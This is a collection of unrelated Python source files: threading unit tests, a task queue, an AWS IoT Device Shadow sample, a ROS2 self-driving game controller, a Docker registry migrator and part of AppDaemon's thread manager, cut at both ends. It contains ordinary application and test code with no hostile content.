self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
core.py | import time
from Engine.EngineTest.engineTest import EngineTest
import threading, queue
import time
class Core:
"""Class Core that manages task affectation to pluggin-engines
"""
def __init__(self):
self.task_queue = queue.Queue()
threading.Thread(target=self.pooling, daemon=True).start()
def add_new_Task(self, function, args= None, kwargs = {}, startCallback=lambda x: None, callback=lambda x: None, endCallback=lambda x: None):
self.task_queue.put((function, args, kwargs, startCallback, callback, endCallback))
def pooling(self):
while True:
time.sleep(0.250)
function, args, kwargs, startCallback, callback, endCallback = self.task_queue.get()
startCallback(args)
result = function(*args, **kwargs)
endCallback(result)
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
self.request_tokens = set()
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
with locked_data.lock:
# check that this is a response to a request from this session
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring get_shadow_accepted message due to unexpected token.")
return
print("Finished getting initial shadow state.")
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring get_shadow_rejected message due to unexpected token.")
return
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring update_shadow_accepted message due to unexpected token.")
return
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
except Exception as e:
exit(e)
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring update_shadow_rejected message due to unexpected token.")
return
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
),
client_token=token,
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
    """Read values typed by the user until they quit or an error occurs."""
    while True:
        try:
            new_value = input()
            # 'exit'/'quit' ends the sample; anything else becomes the new value.
            if new_value in ['exit', 'quit']:
                exit("User has quit")
                # exit() only signals shutdown; leave the loop explicitly.
                break
            change_shadow_value(new_value)
        except Exception as e:
            print("Exception on input thread.")
            exit(e)
            break
if __name__ == '__main__':
    # Sample entry point: parse args, connect to AWS IoT Core, subscribe to
    # the shadow topics, request the current shadow state, then let the
    # user-input thread drive updates until 'quit' or an error.
    # Process input args
    args = parser.parse_args()
    thing_name = args.thing_name
    shadow_property = args.shadow_property
    io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
    # Spin up resources
    event_loop_group = io.EventLoopGroup(1)
    host_resolver = io.DefaultHostResolver(event_loop_group)
    client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
    proxy_options = None
    if (args.proxy_host):
        proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
    if args.use_websocket == True:
        # Websocket connection signed with the default AWS credentials chain.
        credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
        mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
            endpoint=args.endpoint,
            client_bootstrap=client_bootstrap,
            region=args.signing_region,
            credentials_provider=credentials_provider,
            http_proxy_options=proxy_options,
            ca_filepath=args.root_ca,
            client_id=args.client_id,
            clean_session=True,
            keep_alive_secs=30)
    else:
        # Mutual-TLS connection using an X.509 certificate and private key.
        mqtt_connection = mqtt_connection_builder.mtls_from_path(
            endpoint=args.endpoint,
            cert_filepath=args.cert,
            pri_key_filepath=args.key,
            client_bootstrap=client_bootstrap,
            ca_filepath=args.root_ca,
            client_id=args.client_id,
            clean_session=True,
            keep_alive_secs=30,
            http_proxy_options=proxy_options)
    print("Connecting to {} with client ID '{}'...".format(
        args.endpoint, args.client_id))
    connected_future = mqtt_connection.connect()
    shadow_client = iotshadow.IotShadowClient(mqtt_connection)
    # Wait for connection to be fully established.
    # Note that it's not necessary to wait, commands issued to the
    # mqtt_connection before its fully connected will simply be queued.
    # But this sample waits here so it's obvious when a connection
    # fails or succeeds.
    connected_future.result()
    print("Connected!")
    try:
        # Subscribe to necessary topics.
        # Note that is **is** important to wait for "accepted/rejected" subscriptions
        # to succeed before publishing the corresponding "request".
        print("Subscribing to Update responses...")
        update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
            request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_update_shadow_accepted)
        update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
            request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_update_shadow_rejected)
        # Wait for subscriptions to succeed
        update_accepted_subscribed_future.result()
        update_rejected_subscribed_future.result()
        print("Subscribing to Get responses...")
        get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
            request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_get_shadow_accepted)
        get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
            request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_get_shadow_rejected)
        # Wait for subscriptions to succeed
        get_accepted_subscribed_future.result()
        get_rejected_subscribed_future.result()
        print("Subscribing to Delta events...")
        delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
            request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_shadow_delta_updated)
        # Wait for subscription to succeed
        delta_subscribed_future.result()
        # The rest of the sample runs asynchronously.
        # Issue request for shadow's current state.
        # The response will be received by the on_get_accepted() callback
        print("Requesting current shadow state...")
        with locked_data.lock:
            # use a unique token so we can correlate this "request" message to
            # any "response" messages received on the /accepted and /rejected topics
            token = str(uuid4())
            publish_get_future = shadow_client.publish_get_shadow(
                request=iotshadow.GetShadowRequest(thing_name=args.thing_name, client_token=token),
                qos=mqtt.QoS.AT_LEAST_ONCE)
            locked_data.request_tokens.add(token)
        # Ensure that publish succeeds
        publish_get_future.result()
        # Launch thread to handle user input.
        # A "daemon" thread won't prevent the program from shutting down.
        print("Launching thread to read user input...")
        user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
        user_input_thread.daemon = True
        user_input_thread.start()
    except Exception as e:
        exit(e)
    # Wait for the sample to finish (user types 'quit', or an error occurs)
    is_sample_done.wait()
|
admiralnet_e2e_ros.py | import argparse
import skimage
import skimage.io as io
import os
import time
from concurrent import futures
import logging
import argparse
import lmdb
import deepracing.backend
from numpy_ringbuffer import RingBuffer as RB
import yaml
import torch
import torchvision
import torchvision.transforms as tf
import deepracing.imutils
import scipy
import scipy.interpolate
import rpyutils
with rpyutils.add_dll_directories_from_env("PATH"):
import py_f1_interface
import deepracing.pose_utils
import deepracing
import threading
import numpy.linalg as la
import scipy.integrate as integrate
import socket
import scipy.spatial
import queue
import torch
import torch.nn as NN
import torch.utils.data as data_utils
import matplotlib.pyplot as plt
from sensor_msgs.msg import Image, CompressedImage
from deepracing_msgs.msg import PathRaw, ImageWithPath
from geometry_msgs.msg import Vector3Stamped, Vector3, PointStamped, Point, PoseStamped, Pose, Quaternion
from nav_msgs.msg import Path
from std_msgs.msg import Float64, Header
import rclpy
from rclpy import Parameter
from rclpy.node import Node
from rclpy.time import Time
from rclpy.clock import Clock, ROSClock
import deepracing_models.nn_models.Models as M
from scipy.spatial.transform import Rotation as Rot
import cv_bridge, cv2, numpy as np
from scipy.signal import butter, lfilter
from scipy.signal import freqs, bilinear
from numpy_ringbuffer import RingBuffer as RB
import time
class AdmiralNetE2EROS(Node):
    """ROS2 node that drives the F1 game end-to-end with an AdmiralNet model.

    Subscribes to (optionally compressed) cropped screen captures, maintains
    ring buffers of RGB frames and Farneback optical flow, and runs a control
    loop that feeds the network's context window and forwards filtered
    steering/throttle/brake commands to the game via py_f1_interface.
    """
    def __init__(self):
        super(AdmiralNetE2EROS,self).__init__('admiralnet_e2e_control', allow_undeclared_parameters=True, automatically_declare_parameters_from_overrides=True)
        # Virtual controller used to inject steering/throttle/brake into the game.
        self.controller = py_f1_interface.F1Interface(1)
        self.controller.setControl(0.0,0.0,0.0)
        model_file_param = self.get_parameter("model_file")
        if (model_file_param.type_==Parameter.Type.NOT_SET):
            raise ValueError("The parameter \"model_file\" must be set for this rosnode")
        model_file = model_file_param.get_parameter_value().string_value
        print("Using model file : " + str(model_file))
        # Model hyperparameters live in a config.yaml next to the weights file.
        config_file = os.path.join(os.path.dirname(model_file),"config.yaml")
        with open(config_file,'r') as f:
            config = yaml.load(f, Loader = yaml.SafeLoader)
        input_channels = config["input_channels"]
        context_length = config["context_length"]
        sequence_length = config["sequence_length"]
        output_dimension = config["output_dimension"]
        hidden_dimension = config["hidden_dimension"]
        gpu_param : Parameter = self.get_parameter_or("gpu",Parameter("gpu", value=0))
        print("gpu_param: " + str(gpu_param))
        use_compressed_images_param : Parameter = self.get_parameter_or("use_compressed_images",Parameter("use_compressed_images", value=False))
        print("use_compressed_images_param: " + str(use_compressed_images_param))
        self.gpu = gpu_param.get_parameter_value().integer_value
        self.net : NN.Module = M.AdmiralNetKinematicPredictor(input_channels=input_channels, context_length=context_length, output_dimension=output_dimension, sequence_length=sequence_length, hidden_dim=hidden_dimension)
        self.net.double()
        self.get_logger().info('Loading model file: %s' % (model_file) )
        self.net.load_state_dict(torch.load(model_file,map_location=torch.device("cpu")))
        self.get_logger().info('Loaded model file: %s' % (model_file) )
        self.get_logger().info('Moving model params to GPU')
        self.net.cuda(self.gpu)
        self.get_logger().info('Moved model params to GPU')
        self.net.eval()
        self.rosclock = ROSClock()
        self.cvbridge : cv_bridge.CvBridge = cv_bridge.CvBridge()
        # Rolling buffers of the network's raw steering/acceleration outputs,
        # used as the window for the low-pass filter below.
        capacity=10
        self.steer_buffer = RB(capacity)
        self.accel_buffer = RB(capacity)
        # 3rd-order analog Butterworth low-pass, discretized via bilinear
        # transform at the expected screen-capture rate.
        cutoff_freq = 20.0 # 20 hz filter
        b,a = butter(3,cutoff_freq,analog=True)
        fs = 90.888099
        self.dt = 1/fs
        z, p = bilinear(b,a,fs=fs)
        self.z = z
        self.p = p
        if use_compressed_images_param.get_parameter_value().bool_value:
            self.image_sub = self.create_subscription( CompressedImage, '/f1_screencaps/cropped/compressed', self.compressedImageCallback, 1)
        else:
            self.image_sub = self.create_subscription( Image, '/f1_screencaps/cropped', self.imageCallback, 1)
        self.control_thread = threading.Thread(target=self.controlLoop)
        # Context windows of optical flow (2 channels) and RGB frames
        # (3 channels), both at the network's 66x200 input resolution.
        self.flow_buffer = RB(self.net.context_length,dtype=(np.float64,(2,66,200)))
        self.image_buffer = RB(self.net.context_length,dtype=(np.float64,(3,66,200)))
        self.running=False
        self.prev_image = None
    def start(self):
        """Start the background control loop thread."""
        self.running=True
        self.control_thread.start()
    def stop(self):
        """Ask the control loop to exit after its current iteration."""
        self.running=False
    def controlLoop(self):
        """Run inference on the buffered context and drive the game until stopped."""
        while self.running:
            t1 = time.time()
            imnp = np.array(self.image_buffer).astype(np.float64).copy()
            imtorch = torch.from_numpy(imnp.copy())
            flownp = np.array(self.flow_buffer).astype(np.float64).copy()
            flowtorch = torch.from_numpy(flownp.copy())
            # Wait until both buffers hold a full context window.
            if not ( imtorch.shape[0] == self.net.context_length and flowtorch.shape[0] == self.net.context_length ):
                continue
            controlout = self.net(torch.cat((imtorch, flowtorch), dim=1).unsqueeze(0).cuda(self.gpu))
            steering = controlout[0,0,0].item()
            differential = controlout[0,0,1].item()
            self.steer_buffer.append(steering)
            self.accel_buffer.append(differential)
            # Only act once the filter windows are fully populated.
            if not (self.steer_buffer.is_full and self.accel_buffer.is_full):
                continue
            steering_filtered = lfilter(self.z,self.p,np.array(self.steer_buffer))
            accel_filtered = np.array(self.accel_buffer)
            #accel_filtered = lfilter(self.z,self.p,np.array(self.accel_buffer))
            steering = 1.5*steering_filtered[-1]
            differential = 10.0*accel_filtered[-1]
            # Positive differential -> throttle, negative -> brake.
            if differential>0:
                self.controller.setControl(-steering, differential, 0.0)
            else:
                self.controller.setControl(-steering, 0.0, -differential)
            t2 = time.time()
            dt = t2-t1
            # print("dt: %f. fs: %f", (dt,1/dt))
    def compressedImageCallback(self, img_msg : CompressedImage):
        """Decode a compressed screencap, compute optical flow, and buffer both."""
        try:
            imnp = self.cvbridge.compressed_imgmsg_to_cv2(img_msg, desired_encoding="rgb8")
        except Exception as e:
            print(e)
            return
        # Fix: the second condition previously re-checked shape[0]; also reject zero width.
        if imnp.shape[0]<=0 or imnp.shape[1]<=0:
            return
        imnpdouble = tf.functional.to_tensor(deepracing.imutils.resizeImage( imnp, (66,200) ) ).double().numpy().copy()
        if self.prev_image is None:
            # Optical flow needs two frames; stash the first and wait.
            self.prev_image = cv2.cvtColor( (255*imnpdouble).astype(np.uint8).transpose(1,2,0) , cv2.COLOR_RGB2GRAY )
            return
        img_curr = cv2.cvtColor( (255*imnpdouble).astype(np.uint8).transpose(1,2,0) , cv2.COLOR_RGB2GRAY )
        flow = cv2.calcOpticalFlowFarneback(self.prev_image, img_curr, None, 0.5, 3, 15, 3, 5, 1.2, 0).astype(np.float64)
        self.flow_buffer.append(flow.transpose(2,0,1))
        self.image_buffer.append(imnpdouble)
        self.prev_image = img_curr
    def imageCallback(self, img_msg : Image):
        """Convert an uncompressed screencap and buffer it (no optical flow here)."""
        print("Got an image")
        if img_msg.height<=0 or img_msg.width<=0:
            return
        try:
            # Fix: raw Image messages must go through imgmsg_to_cv2;
            # compressed_imgmsg_to_cv2 is only valid for CompressedImage.
            imnp = self.cvbridge.imgmsg_to_cv2(img_msg, desired_encoding="rgb8")
        except Exception as e:
            # Fix: the bare except printed an undefined name 'e'; bind the exception.
            print(e)
            return
        imnpdouble = tf.functional.to_tensor(deepracing.imutils.resizeImage( imnp, (66,200) ) ).double().numpy().copy()
        self.image_buffer.append(imnpdouble)
|
Migrator.py | import logging
import copy
from threading import Thread
from Queue import Queue
class Migrator(object):
    """Copies Docker images from a source registry into an Artifactory target
    using a pool of worker threads fed from a shared work queue."""

    def __init__(self, source_registry, artifactory_access, work_queue, workers, overwrite, dir_path):
        self.log = logging.getLogger(__name__)
        self.source = source_registry
        self.target = artifactory_access
        self.work_queue = work_queue
        self.failure_queue = Queue()
        self.skipped_queue = Queue()
        self.overwrite = overwrite
        self.workers = workers
        self.dir_path = dir_path

    def migrate(self):
        """Iterates over the Queue until all images have been uploaded (or have
        failed to upload)."""
        for worker_id in range(self.workers):
            worker = Thread(target=self.__worker, args=(worker_id,))
            worker.daemon = True
            worker.start()
        self.work_queue.join()

    def __worker(self, idx):
        """Consumes image/tags that need to be uploaded from the Queue until it
        is empty, recording failures and skips on the shared queues.
        @param idx - The index (or ID) of this worker. Should be unique across
                     all concurrent workers.
        """
        # The endpoint resources are not thread safe, make deep copies
        source = copy.deepcopy(self.source)
        target = copy.deepcopy(self.target)
        while True:
            image, tag = self.work_queue.get()
            failure = True
            try:
                if not self.overwrite and target.image_exists(image, tag):
                    # Image already exists and we should not overwrite it
                    failure = False
                    self.skipped_queue.put((image, tag))
                else:
                    failure = not self.__upload_image(source, target, image, tag, idx)
            except Exception:
                self.log.error("Upload of %s/%s failed." % (image, tag))
            if failure:
                self.failure_queue.put((image, tag))
            self.work_queue.task_done()

    def __upload_image(self, source, target, image, tag, idx):
        """Attempts to upload one image:tag from the source to the target.
        Returns True on success, False on any failure (already logged)."""
        self.log.info("Uploading image %s/%s..." % (image, tag))
        layer_file = "%s/layer%d.out" % (self.dir_path, idx)
        manifest_file = "%s/manifest%d.json" % (self.dir_path, idx)
        # Grab the manifest first; nothing can proceed without it.
        if not source.download_manifest(image, tag, manifest_file):
            self.log.error("Unable to get manifest for %s/%s..." % (image, tag))
            return False
        type, layers = source.interpret_manifest(manifest_file)
        for layer in layers:
            sha2 = layer.replace('sha256:', '')
            # Cheapest path: a sha2 checksum deploy avoids touching the source.
            if target.checksum_deploy_sha2(image, tag, sha2):
                continue
            sha1 = source.download_layer(image, layer, layer_file)
            if not sha1:
                self.log.error("Unable to get layer %s for %s/%s..." % (layer, image, tag))
                return False
            # Next cheapest: sha1 checksum deploy avoids the actual upload.
            if target.checksum_deploy_sha1(image, tag, sha2, sha1):
                continue
            # All checksum deploys failed, perform an actual upload.
            if not target.upload_layer(image, tag, sha2, layer_file):
                self.log.error("Unable to upload layer %s for %s/%s" % (layer, image, tag))
                return False
        # Finished uploading all layers, upload the manifest
        if not target.upload_manifest(image, tag, type, manifest_file):
            self.log.error("Unable to deploy manifest for %s/%s..." % (image, tag))
            return False
        return True

    def get_failure_queue(self):
        """Queue of (image, tag) pairs that could not be uploaded."""
        return self.failure_queue

    def get_skipped_queue(self):
        """Queue of (image, tag) pairs skipped because they already exist."""
        return self.skipped_queue
|
threading.py | import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
    def __init__(self, ad: AppDaemon, kwargs):
        """Manage AppDaemon's worker-thread pool and its callback statistics."""
        self.AD = ad
        self.kwargs = kwargs
        self.logger = ad.logging.get_child("_threading")
        self.diag = ad.logging.get_diag()
        # thread_count tracks live workers; threads maps "thread-N" -> {queue, thread}
        self.thread_count = 0
        self.threads = {}
        # A few shortcuts
        self.add_entity = ad.state.add_entity
        self.get_state = ad.state.get_state
        self.set_state = ad.state.set_state
        self.add_to_state = ad.state.add_to_state
        self.add_to_attr = ad.state.add_to_attr
        # Pinning defaults; create_initial_threads() recalculates these from config.
        self.auto_pin = True
        self.pin_threads = 0
        self.total_threads = 0
        # Setup stats
        self.current_callbacks_executed = 0
        self.current_callbacks_fired = 0
        self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
        self.callback_list = []
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{
"fired": self.current_callbacks_fired,
"executed": self.current_callbacks_executed,
"ts": now
})
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (self.callback_list[len(self.callback_list) -1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
    async def create_initial_threads(self):
        """Size the worker pool from config (threads/total_threads/pin_apps/pin_threads)
        and start the initial threads."""
        kwargs = self.kwargs
        if "threads" in kwargs:
            self.logger.warning(
                "Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
        if "total_threads" in kwargs:
            self.total_threads = kwargs["total_threads"]
            self.auto_pin = False
        else:
            # Default pool size: one thread per active app.
            apps = await self.AD.app_management.check_config(True, False)
            self.total_threads = int(apps["active"])
        self.pin_apps = True
        utils.process_arg(self, "pin_apps", kwargs)
        if self.pin_apps is True:
            self.pin_threads = self.total_threads
        else:
            self.auto_pin = False
            self.pin_threads = 0
            # With unpinned apps, fall back to a fixed pool size unless configured.
            if "total_threads" not in kwargs:
                self.total_threads = 10
        utils.process_arg(self, "pin_threads", kwargs, int=True)
        if self.pin_threads > self.total_threads:
            raise ValueError("pin_threads cannot be > total_threads")
        if self.pin_threads < 0:
            raise ValueError("pin_threads cannot be < 0")
        self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
        # Unpinned callbacks are assigned round-robin starting just past the pinned range.
        self.next_thread = self.pin_threads
        self.thread_count = 0
        for i in range(self.total_threads):
            await self.add_thread(True)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split('(\d+)', text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
    async def dump_threads(self):
        """Log a diagnostic summary of every worker thread and its queue."""
        self.diag.info("--------------------------------------------------")
        self.diag.info("Threads")
        self.diag.info("--------------------------------------------------")
        current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
        max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
        max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
        last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
        self.diag.info("Currently busy threads: %s", current_busy)
        self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
        self.diag.info("Last activity: %s", last_action_time)
        self.diag.info("Total Q Entries: %s", self.total_q_size())
        self.diag.info("--------------------------------------------------")
        for thread in sorted(self.threads, key=self.natural_keys):
            t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
            # NOTE(review): stray debug print to stdout - consider removing or
            # routing it through self.diag like the rest of this method.
            print("thread.{}".format(thread), t)
            self.diag.info(
                "%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
                thread,
                t["attributes"]["q"],
                t["state"],
                t["attributes"]["time_called"],
                t["attributes"]["is_alive"],
                await self.get_pinned_apps(thread)
            )
        self.diag.info("--------------------------------------------------")
#
# Thread Management
#
    def select_q(self, args):
